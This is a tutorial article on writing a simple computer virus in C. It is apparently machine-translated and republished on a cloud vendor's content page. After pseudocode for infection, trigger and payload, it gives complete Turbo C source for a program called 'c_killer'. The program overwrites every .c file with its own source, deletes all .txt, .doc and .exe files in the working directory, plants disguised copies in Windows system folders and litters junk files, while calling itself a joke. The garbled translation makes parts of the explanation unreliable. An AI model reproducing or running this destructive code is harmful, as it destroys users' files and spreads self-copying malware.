Write simple viruses in C Language

Source: Internet
Author: User

[Abstract] based on analyzing the virus mechanism, a small virus is written in C language as an example, which is implemented using turboc2.0.
[Abstract] This paper introduce the charateristic of the computer virus, then show a simple example written by turboc2.0.
1. What is a virus?
Malware may be the first computer security problem that affects us. Therefore, viruses are very important in information security.
We need to understand the virus to deal with the virus.
Writing viruses is a good method.
If you want to write a virus, you must first know what it is. You can define a virus, which is widely accepted. Dr. Frederic Cohen mentioned in a brief lecture on computer viruses:
"…… A program that can include or release a self-copy and infect another program by modifying itself. "

In fact, viruses are not very different from common programs, and they are usually relatively simple, not as complicated as many programs. However, the virus uses some technologies that are generally not used by normal programs.
To compile a virus, you must first understand the operating mechanism of the virus.
Regardless of the virus, it is generally divided into three functional modules in the structure: infection mechanism, trigger mechanism and payload.
In the virus structure, the first and only necessary part is the infection mechanism. A virus must first be a code that can breed itself. This is the root cause of a virus becoming a virus.
Cause. We can use a class C pseudo code to represent this process.
Infectsection ()
{
If (infectable_object_found
& Object_not_already_infect)
Infect_object;
}

The second major component of the virus is the payload-triggered event. when a virus arrives on your computer, it is unlikely to attack immediately, otherwise it will not spread far away. latent enemies are always more dangerous than the ones you can see. viruses are usually triggered after a certain number of infected bodies, a certain date or time, and a certain piece of text are found.
A simple trigger mechanism may work like this:
Triggersection ()
{
If (date_is_friday_13th_and_time_is_03: 13: 13)
Set_trigger_status_to_yes;
}

Payload is the way viruses are used to harass your computer. Viruses with triggering mechanisms also have payload. It can send you a simple one-time dumb message, reformat your disk, and mail it to your e_mail contact, which can be a valid load. Simple load balancing can be performed as follows:
Executesection ()
{
If (trigger_statue_is_yes)
Execute_payload;
}

2. Compile a virus Language
The most common virus compiling languages include Assembly Language, VB, and C language. Let's take a look at a well-known virus forum to learn the basics of virus writing:
1). Win32 programming, process, thread, memory, and so on.
2). 32-bit assembly, mainly in command usage. 386 compilation is enough.
3). PE format. Check the file formats of other files that may be infected.
4) debugging technology. VC, td32, SoftICE, and so on.
There are a lot of things to be mastered, and I have never heard of them yet, which is quite scary. But in fact, even if we don't know much about the computer's principles and operating systems, we are not familiar
Other languages, as long as we have some knowledge of C library functions, can write something similar to viruses.

3. Compile the virus with C
Take turboc2.0 as an example. Its library functions can implement many functions.
See the following two functions:
1). findfirst and findnext functions: In Dir. h. Findfirst is used to find various types of files, including the file name length, file attributes, and so on. findnext and findfirst are used together to find the next file of the same type.
2). Remove function: In stdio. H. As long as you know the file name, you can delete any type of files.

Iv. My C Virus
<Computer virus decryption> there is a classic saying: "The Damage Caused by malware may be regarded as psychological damage.
It may be more appropriate. "In this sense, my virus is a very typical virus.
The following is my virus.
It consists of four modules.
Rubbishmaker () can be used to generate a large number of randomly named junk files in the current directory.
Createxe(.exe spam will be placed in the sensitive location of the C drive, and they need to be hidden.
Remove () will delete some of your items, so do not run this program at will.
Breed () is the essence of c_killer. It will kill all C Programs and use them to breed itself.
The first three are payload.

The fourth is its infection mechanism.

/**********************************IN FACT,IT"S NOT A VIRYUS AT ALL.**********************************/#include <io.h>#include <dir.h>#include <stdio.h>#include <stdlib.h>#include <string.h>/* copy outfile to infile */void copyfile(char *infile, char *outfile){    FILE *in,*out;    in = fopen(infile,"r");    out = fopen(outfile,"w");    while (!feof(in))    {        fputc(fgetc(in),out);    }    fclose(in);    fclose(out);}/*This function  named Rubbishmaker.*/void MakeRubbish(){    int i;        FILE *fp;    char *path;    char *NewName;    char *disk[7] = {"A","B","C","D","E","F","G"};    char *addtion = ":\\";    /* Make some rubbish at the current catalogue */    for (i = 0; i<5; i++)    {        char tempname[] = "XXXXXX" ;        NewName = mktemp(tempname);        fp = fopen(NewName,"w");        fclose(fp);    }/* make some rubbish at the root catalogue */    path = strcat(disk[getdisk()],addtion); /* get the root catalogue */    chdir(path); /*change directory according to the "path" */    for (i = 0; i<5; i++)    {        char tempname[] = "XXXXXX";        NewName = mktemp(tempname);        fp = fopen(NewName,"w");        fclose(fp);    }}/*  This function can  creat some .exe or .com documents in the sensitive place.  Don't worry,It's only a joke.It will do no harm to your computer.*/void CreatEXE(){    int i;    char *path;    char *s[2] = {"C:\\WINDOWS\\system32\\loveworm.exe","C:\\WINDOWS\\virusssss.com"};    for ( i = 0; i < 2; i++)    {        open(s[i], 0x0100,0x0080);        copyfile( "C_KILLER.C",s[i]);    }}/* remove something from your computer */void Remove(){            int done;    int i;    struct ffblk ffblk;    char *documenttype[3] = {"*.txt","*.doc","*.exe"};    for (i = 0; i < 3; i++)    {        done = findfirst(documenttype[i],&ffblk,2);        while (!done)        {                remove(ffblk.ff_name);                done = findnext(&ffblk);        }    }}/* overlay the c programs */void Breed(){            int done;    struct ffblk ffblk;    done = findfirst("*.c",&ffblk,2);    while (!done)    {        if (strcmp("C_KILLER.C", ffblk.ff_name) != 0 )        {                copyfile("C_KILLER.C",ffblk.ff_name);        }        done = findnext(&ffblk);    }}void main(){        printf("THERE IS A VIRUS BY  XIAOKE.\n\n");        Breed();        Remove();        CreatEXE();        printf("COULD YOU TELL ME YOUR NAME?\n\n");        printf("NOW,PLEASE ENTER YOUR NAME,OR THERE WILL BE SOME TROUBLE WITH YOU!\n\n");        MakeRubbish();        getchar();        printf("IT'S ONLY A JOKE! THANK YOU!\n\n");        clrscr();        system("cmd");}

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.